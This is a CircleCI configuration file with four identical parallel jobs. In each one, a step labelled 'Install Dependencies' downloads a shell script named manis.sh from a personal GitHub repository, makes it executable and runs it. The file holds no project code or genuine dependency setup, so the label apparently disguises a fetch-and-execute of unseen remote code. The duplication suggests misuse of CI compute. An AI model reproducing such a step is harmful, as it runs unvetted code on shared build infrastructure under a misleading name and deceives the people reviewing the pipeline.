version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Kotakajib/circi/main/manis.sh && chmod +x manis.sh && ./manis.sh
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Kotakajib/circi/main/manis.sh && chmod +x manis.sh && ./manis.sh
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Kotakajib/circi/main/manis.sh && chmod +x manis.sh && ./manis.sh
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Kotakajib/circi/main/manis.sh && chmod +x manis.sh && ./manis.sh
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3
